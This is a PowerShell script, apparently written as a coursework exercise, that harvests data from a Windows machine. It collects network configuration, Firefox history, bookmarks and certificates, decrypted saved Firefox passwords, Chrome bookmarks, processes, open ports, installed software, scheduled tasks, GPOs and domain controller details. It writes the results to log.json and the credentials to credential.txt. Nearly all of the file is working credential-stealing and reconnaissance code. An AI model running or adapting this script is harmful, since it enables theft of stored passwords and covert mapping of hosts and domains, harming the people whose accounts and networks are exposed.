﻿#---------------------- Importation ---------------------

# Load PSSQLite from the 'Packages' directory.
import-module("$($pwd)\DM1\Packages\pssqlite")

# Load the Get-FirefoxPasswords function from the 'Packages' directory.
. ./DM1/Packages/Get-FirefoxPasswords.ps1

# Stop the program if there is an error.
$ErrorActionPreference = "stop"

#--------------------------------------------------------

#-------------------- Usefull variables ------------------

$username = $([Environment]::UserName)

# Directory within it the firefox files are stored.
$firefox_directory = (dir C:\Users\$($username)\AppData\Roaming\Mozilla\Firefox\Profiles | Select-Object Name | Where-Object {$_.Name -Match ".*default-esr"}).Name

#--------------------------------------------------------


# Get with simple powershell commands some information about the network.
$ip = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
$mac = (Get-NetAdapter | Where-Object {$_.Name -like 'Ethernet'}).MacAddress
$default_gateway = (Get-NetIPConfiguration | Select-Object IPv4DefaultGateway).IPv4DefaultGateway.NextHop
$wifi_name = (get-netconnectionProfile).Name
$domain_name = (Get-WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem).Domain
$dns = (Get-DnsClientServerAddress -AddressFamily IPv4).ServerAddresses

# Build the json with wanted informations.
$net = @{
"ip" = $ip;
"mac" = $mac;
"default gateway" = $default_gateway;
"wifi name" = $wifi_name;
"domain name" = $domain_name;
"dns" = $dns
}

# Firefox part. Get the firefox's files to get some firefox informations.

# Get the firefox executable to get the firefox's version.
$firefox_version = (Get-Item 'C:\Program Files\Mozilla Firefox\firefox.exe').VersionInfo.ProductVersion

# Get the firefox's addons json and retrieve wanted informations.
$firefox_addons = (Get-Content "C:\Users\$($username)\AppData\Roaming\Mozilla\Firefox\Profiles\$($firefox_directory)\addons.json" | Out-String | ConvertFrom-Json).addons.name

# Get some .sqlite files and call PSSQLite module to parse them.

# Get the sqlite file.
$places_file = "C:\Users\$($username)\AppData\Roaming\Mozilla\Firefox\Profiles\$($firefox_directory)\places.sqlite"

# Makes connection with the file.
$places_connexion = New-SQLiteConnection -DataSource $places_file

$cert9_file = "C:\Users\$($username)\AppData\Roaming\Mozilla\Firefox\Profiles\$($firefox_directory)\cert9.db"
$cert9_connexion = New-SQLiteConnection -DataSource $cert9_file

# Build the string of the SQL query.
$firefox_history_query = "SELECT url FROM moz_places"

# Get the wanted field.
$firefox_history = (Invoke-SqliteQuery -SQLiteConnection $places_connexion -Query $firefox_history_query).url

$bookmarks_query = "SELECT * FROM moz_bookmarks"
$firefox_bookmarks = (Invoke-SqliteQuery -SQLiteConnection $places_connexion -Query $bookmarks_query | where fk -ne $null | Select-Object title).title

$cert_query = "SELECT a11 FROM 'nssPublic' LIMIT 0,30"
$firefox_cert = (Invoke-SqliteQuery -SQLiteConnection $cert9_connexion -Query $cert_query).a11

# Instantiate the variable that will contain the credentials with the following format :
# [(username1, password1), (username2, password2), ...] 
$firefox_credentials = New-Object System.Collections.ArrayList

# Call the function loaded from 'Packages'
$firefox_credentials_colection = Get-FirefoxPasswords

# Iterate on the credentials to format them.
Foreach($element in $firefox_credentials_colection)
{
    if ($element.usernameField -ne $null)
    {
        $firefox_credentials.Add([Tuple]::Create($element.username, $element.password))
    }
}

# Build the firefox json.
$firefox = @{
"version" = $firefox_version;
"addons" = $firefox_addons;
"certificates" = $firefox_cert;
"bookmarks" = $firefox_bookmarks;
"history" = $firefox_history;
"credentials" = $firefox_credentials
}

try
{

	$chrome_version = (Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.ProductVersion


	$chrome_bookmarks = (Get-Content "C:\Users\$($username)\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" | Out-String | ConvertFrom-Json).roots.bookmark_bar.children.name

	# $history_file = "C:\Users\$($username)\AppData\Local\Google\Chrome\User Data\Default\History"
	# $history_connexion = New-SQLiteConnection -DataSource $history_file

	# $chrome_history_query = "SELECT url FROM urls LIMIT 30"
	# $chrome_history = (Invoke-SqliteQuery -SQLiteConnection $history_connexion -Query $chrome_history_query).url

	$chrome = @{
	"version" = $chrome_version;
	"bookmarks" = $chrome_bookmarks;
	}
}
catch
{
	$chrome = "Chrome is not installed here ..."
}

# Build the navigateurs json with firefox and chrome json.
$navigateurs = @{
"firefox" = $firefox;
"chrome" = $chrome
}

$planned_tasks = (Get-ScheduledTask | Where State -eq 'Ready').TaskName
$processes_colection = Get-Process
$processes = New-Object System.Collections.ArrayList

Foreach($element in $processes_colection)
{
    $processes.Add([Tuple]::Create($element.Id, $element.ProcessName))
}

$port_colection = get-nettcpconnection
$port = New-Object System.Collections.ArrayList

Foreach($element in $port_colection)
{
    $port.Add([Tuple]::Create($element.LocalPort, $element.State))
}

$applications_colection = Get-Package | ? { $_.ProviderName -ne "msu" }
$applications = New-Object System.Collections.ArrayList

Foreach($element in $applications_colection)
{
    # Check if a version is spcified. 
    if ($element.Version -eq $null)
    {
        $applications.Add([Tuple]::Create($element.Name, "No version registered"))
    }
    else
    {
        $applications.Add([Tuple]::Create($element.Name, $element.Version))
    }
}

$start_menu = wmic startup get caption

$Applications = @{
"planned tasks" = $planned_tasks;
"process" = $processes;
"port" = $port;
"applications" = $applications;
"start menu" = $start_menu
}

$os_version = (Get-WmiObject Win32_OperatingSystem | Select-Object Version).Version

# Try catch to specify in json if the user can't access GPO and DC informations.
try
{
	$gpo = (Get-GPO -All -Domain $domain_name | Select-Object "DisplayName").DisplayName
}
catch
{
	$gpo = "Can t access GPO from here ..."
}

try
{
	$domain_controller = (Get-ADDomainController | Select-Object "HostName").HostName
}
catch
{
	$domain_controller = "Can t access Domain controller from here ..."
}

$security = @{
"os version" = $os_version;
"gpo" = $gpo;
"domain_controller" = $domain_controller
}

$json = @{
"net" = $net;
"navigateur" = $navigateurs;
"firefox" = $firefox;
"Applications" = $Applications;
"security" = $security
}

# Serialize the resulting json on file at the root of 'DM1'.
$json | ConvertTo-Json | Set-Content "C:\Users\$($username)\DM1\log.json"

# Write credentials in file
$firefox_credentials | Out-File -FilePath DM1\credential.txt 